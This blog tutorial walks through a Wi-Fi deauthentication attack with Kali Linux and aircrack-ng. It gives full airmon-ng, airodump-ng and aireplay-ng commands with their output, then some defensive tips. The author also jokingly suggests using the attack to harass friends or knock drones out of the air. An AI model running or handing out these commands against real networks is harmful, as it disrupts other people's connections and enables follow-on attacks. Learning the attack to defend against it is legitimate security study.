Deauthentication Attack using Kali Linux

Hacking

— 15 min read
  #deauthentication
 #wireless hacking
 #networking
 #kali linux

by d3ad R1nger | November 2, 2022

Hello and welcome, hacker-curious soon-to-be 1337 hacker legends, and welcome to my first serious article/tutorial on the realm! My
name is d3ad R1nger and today you will learn the theory and also a practical example of a wireless network attack called
deauthentication In my humble opinion, when a hacker learns about a new attack, he or she must also learn how to prevent it. So, this
is not going to be a simple how-to, this article will be divided into 4 parts:

1. | What is a Deauth Attack

2. | Why would you want to attack in that way
3. | How to do it
4. | How to prevent the attack and take the necessary precautions

 Treasures

Feel free to skip steps of course.

🤓 If you know what you are doing and only looking for a simple command list, I got you fam 💜
TL;DR Deauthentication Attack Gist for the Knowledgable

A cool attack that uses this method: Hacking nearby wifis with Evil Twin Attack

What is a Deauth Attack?

A deauthentication attack is a type of denial of service attack that targets communication between a user (or all users) and a Wi-Fi
access point.
This attack sends disassociate packets to one or more clients which are currently associated with a particular access point. Of course,
this attack is useless if there are no associated wireless clients or no fake authentications.
The cool thing about this attack is that even today where all networks are using WPA2 encryption you can still easily deauth almost
anything or anyone without even being inside the network!

Why does a deauth attack work on WPA2 despite encryption?

 The use of encryption in 802.11 is limited to data payloads only. Encryption does not apply to the 802.11 frame headers, and
cannot do so as key elements of 802.11 headers are necessary for normal operations of 802.11 traffic.
Since 802.11 management frames largely work by setting information in the headers, management frames are not encrypted
and as such are easily spoofed.
To prevent deauthentication/disassociation attacks, the IEEE implemented the 802.11w amendment to 802.11. This provides a
mechanism to help prevent the spoofing of management frames, but both client and infrastructure need to support it (and have
it enabled) for it to function. (source)

Why would one attack a network like that?

A deauth attack is, most of the time, the first step for a greater attack, a gateway hack 😂 ! Hackers usually need to deauth a user off of
a network so they can:

 Capture WPA/WPA2 4-Way Handshakes by forcing a user to reconnect to the network

 Force users to connect to their Rogue access point (search: Evil Twin Attack)
 Force users to connect to a Captive Portal for whatever reason

I will be writing articles and tutorials demonstrating every single one of the aforementioned attacks so stay tuned.

You can also deauth users in your network for way simpler reasons, like:

 Kick a sibling or a friend off the network just because they are slowing your connection down
 Frustrate people and laugh
o example, let's say your best friend is a waiter, and he takes his orders from customers with a PDA connected to the
Cafe's Wi-Fi connection, deauth his PDA, and drive him mad. (You didn't read that from me).
 Deauth a drone from its access point mid-air and see what happens. (I haven't done that yet. but I will asap)

Ok, enough with the Theory! Practice!

The art of Deauthing
For this attack we need a tool called aircrack-ng, aircrack-ng is more of a suite actually, containing many tools to assess Wi-Fi
network security.
Aircrack-ng suite comes pre-installed inside the Kali Linux Distribution which I'll be using for all my hacking tutorials and real-life
attack posts.

Ok! one last thing, since we are talking about sending packets we will need a wireless adapter both able to work in monitor mode and
be a packet injector!

 What is Monitor Mode? | For listening and Capturing

o Monitor mode allows you to capture data sent and received by wireless devices and networks nearby. Without it, you
can not see which devices are active and what is happening inside the network.
 What is Packet Injection? | For transmitting and Attacking
o Packet injection allows you to craft and inject or send data to wireless devices and networks nearby. Without it, you can
not intercept or manipulate any activity from within the network.

My favorite wireless adapter, and the one I'll be using for this tutorial, is Alfa AWUSO36NH High Gain USB Wireless G / N Long-
Rang WiFi Network Adapter, it has never failed me thus far and the thing I love the most about it is that it works perfectly with a
Raspberry Pi 4

Step 1 - Fire up Kali Linux and open a Terminal

In Kali, almost all the action happens inside the terminal so you should really get the hang of it.
Now that's a trippy gif.

By typing ifconfig and the enter key on your terminal you get the following output :

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe59:1b51 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:59:1b:51 txqueuelen 1000 (Ethernet)
RX packets 5 bytes 1360 (1.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 69 bytes 5690 (5.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 20 bytes 1116 (1.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20 bytes 1116 (1.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500

ether fa:30:3e:ca:dd:85 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

At the eth0 section in my ifconfig output, you see that I have inet 10.0.2.15, this is because I am running Kali Linux on a Virtual
Machine and it is connected on a nat network. Don't worry about it, you do not even have to care at the moment.

All you have to care about is the wlan0 section that is your wireless adapter and as you can see mine is not even connected to a
network. If it was it would be displaying an IP in the range of 192.168.x.x (Just for answering future questions).

The next command is iwconfig. Type it and execute it on your terminal and boom:

lo no wireless extensions.

eth0 no wireless extensions.

wlan0 IEEE 802.11 ESSID:off/any

Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

From this output, we understand that our wireless card is in Managed Mode and we want it to be in Monitor Mode. So let's do that.

Step 2 - Setting wireless adapter on Monitor mode with airmon-ng

By running the airmon-ng start wlan0 (or whatever your adapter is called, it could be wlan1 or wlan2) you are setting your adapter to
monitor mode! Check out the output :

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
448 NetworkManager
525 dhclient
654 wpa_supplicant

PHY Interface Driver Chipset

phy0 wlan0 ath9k_htc Atheros Communications, Inc. TP-Link TL-WN322G v3 / TL-WN422G v2

802.11g [Atheros AR9271]

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)

(mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm

Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

See the above iwconfig result. Mode:Monitor and the name is wlan0mon! You are ready to go.

Step 3 - Searching for victims with airodump-ng

Execute the command airodump-ng wlan0mon on your terminal and start choosing targets.

Command output:

CH 12 ][ Elapsed: 6 s ][ 2020-09-02 15:41

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

**:**:**:**:**:** -85 2 1 0 6 130 WPA2 CCMP PSK ******911

**:**:**:**:**:** -79 4 0 0 11 65 WPA2 CCMP PSK ******etwork
50:C7:BF:DC:4C:E8 -45 18 0 0 11 270 WPA2 CCMP PSK TP-LINK_AP_4CE8
**:**:**:**:**:** -74 5 0 0 1 270 WPA2 CCMP PSK ******D
**:**:**:**:**:** -75 5 0 0 1 270 OPN ******Fon
**:**:**:**:**:** -79 6 0 0 6 65 WPA CCMP PSK Win******9A84
**:**:**:**:**:** -82 2 2 0 2 270 WPA2 CCMP PSK ******4hu1
**:**:**:**:**:** -81 4 8 0 13 135 WPA CCMP PSK monmp******i
**:**:**:**:**:** -91 2 0 0 1 270 OPN OTE******n
**:**:**:**:**:** -92 3 1 0 1 270 WPA2 CCMP PSK Sp******e Sky

The combination of BSSID and ESSID can help hackers find locations. 😁 Yeap, that's a thing.
The command will keep running and monitoring near Access Point behavior but as soon as we find our target on the list we can just
hit ctrl+c to stop the monitoring process.

You will get a bunch of different access points with a lot of info you don't understand! Let's break them down.

 BSSID | MAC address of the access point. In the Client section, a BSSID of “(not associated)” means that the client is not
associated with any AP. In this unassociated state, it is searching for an AP to connect with.
 PWR | Signal level reported by the card. Its signification depends on the driver, but as the signal gets higher you get closer to
the AP or the station. If the BSSID PWR is -1, then the driver doesn't support signal level reporting. If the PWR is -1 for a
limited number of stations then this is for a packet which came from the AP to the client but the client transmissions are out of
range for your card. Meaning you are hearing only 1/2 of the communication. If all clients have PWR as -1 then the driver
doesn't support signal level reporting.
 Beacons | Number of announcements packets sent by the AP. Each access point sends about ten beacons per second at the
lowest rate (1M), so they can usually be picked up from very far.
 # Data | Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
 #/s | Number of data packets per second measure over the last 10 seconds.
 CH | Channel number (taken from beacon packets).
Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.
 MB | Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.
The dot (after 54 above) indicates short preamble is supported. Displays “e” following the MB speed value if the network has
QoS enabled.
 ENC | Encryption algorithm in use. OPN = no encryption,“WEP?” = WEP or higher (not enough data to choose between WEP
and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP
is present.
  CIPHER | The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is
typically used with WPA and CCMP is typically used with WPA2. WEP40 is displayed when the key index is greater then 0.
The standard states that the index can be 0-3 for 40bit and should be 0 for 104 bit.
 AUTH | The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared
key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for WEP).
 ESSID | Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated. In this
case, airodump-ng will try to recover the SSID from probe responses and association requests.

I will be targeting my own AP TP-LINK_AP_4CE8! You should understand that doing this to other APs is illegal. Unless you
have the permission of course.

Step 4 - Specific Targeting for better information gathering

Now that we know all that we need to know about our target we have to find any devices connected to the network, to do that we run
the following command.

The commands structure is airodump-ng -d "target's BSSID" -c "target's channel number" "wireless adapter monitor mode
name"
In our case the full command is:

airodump-ng -d 50:C7:BF:DC:4C:E8 -c 11 wlan0mon

Now we are monitoring SPECIFICALLY our target and not all nearby access points. Also, we can see that there are two devices
currently inside the network, one of which is my phone!

CH 11 ][ Elapsed: 1 min ][ 2020-09-02 15:59 ]

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

50:C7:BF:DC:4C:E8 -22 91 610 163 4 11 270 WPA2 CCMP PSK TP-LINK_AP_4CE8

BSSID STATION PWR Rate Lost Frames Probe

50:C7:BF:DC:4C:E8 AC:3C:0B:36:BD:5B -32 0e-24 0 12

50:C7:BF:DC:4C:E8 E0:B5:2D:EA:18:A7 -58 1e-24 6 122
Step 5 - Deauthenticating device from network //Kicking

The final command is:

aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan0mon

Command instructions:

 -0 means deauthentication.
 0 is the number of deauths to send, 0 means send them continuously, you can send 10 if you want the target to disconnect and
reconnect.
 -a 50:C7:BF:DC:4C:E8 is the MAC address of the access point we are targeting.
 -c E0:B5:2D:EA:18:A7 is the MAC address of the client to deauthenticate; if this is omitted then all clients are
deauthenticated.
 wlan0mon is the interface name.

The command continuous output:

16:14:41 Waiting for beacon frame (BSSID: 50:C7:BF:DC:4C:E8) on channel 11

16:14:42 Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [99|67 ACKs]
16:14:43 Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [61|59 ACKs]
16:14:43 Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [25|48 ACKs]
16:14:44 Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [ 0|72 ACKs]
16:14:45 Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [ 0|57 ACKs]
16:14:45 Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:18:A7] [ 0|65 ACKs]
16:14:45 Sending 64 directed DeAuth (code 7). STMAC: [E0:B5:2D:EA:^C:A7] [ 0|10 ACKs]
...
...
[until we hit ctrl+c to stop it sending packets]

And its immediate result :

Preventing the attack and taking necessary precautions

You are now well familiar with the attack and know all the theories a beginner may need! But how could one prepare himself to
defend against a deauthentication attack?

You can not stop a bad guy from sending deauth packets... Instead, you should make sure your network is configured in a way that the
deauth attack doesn't enable an attacker to compromise your network.

 Make sure your network is using WPA2 encryption.

 Your Wi-Fi passphrase should be very long and strong.
 Once you have been disconnected from your network, make sure that you connect back to a WPA2 secure network and not an
open one with the same name as yours! IMPORTANT.
 You could also HIDE your SSID from anyone by accessing your router's configuration page.
o Usually on WLAN > Advanced Option
 By a VPN
o A VPN creates a private tunnel between your laptop or smartphone and the VPN server on the other end, encrypting
your traffic from snoops—even your ISP or the operator of the hotspot itself. To find the one that's right for you, read
our roundup of the Best VPN Services, pick a top-rated one, pay for it, and put it on all your devices that use public
Wi-Fi of any sort. You'll be glad you did.

Conclusion
Hacking is not easy, let's start with that. It needs patience and curiosity. You will always have days that everything is just not working
how it should be and you may feel like a loser for not making it work! But that's the trick! Someone has made it work and this must
drive you! Be that someone! And then be more!

Thank you very much for your time and I really hope that you got something from this article/tutorial! Sudorealm is here to stay and
we promise to give you as much as we can!

Leave a Comment on Reddit: Deauthentication Attack using Kali Linux 🍻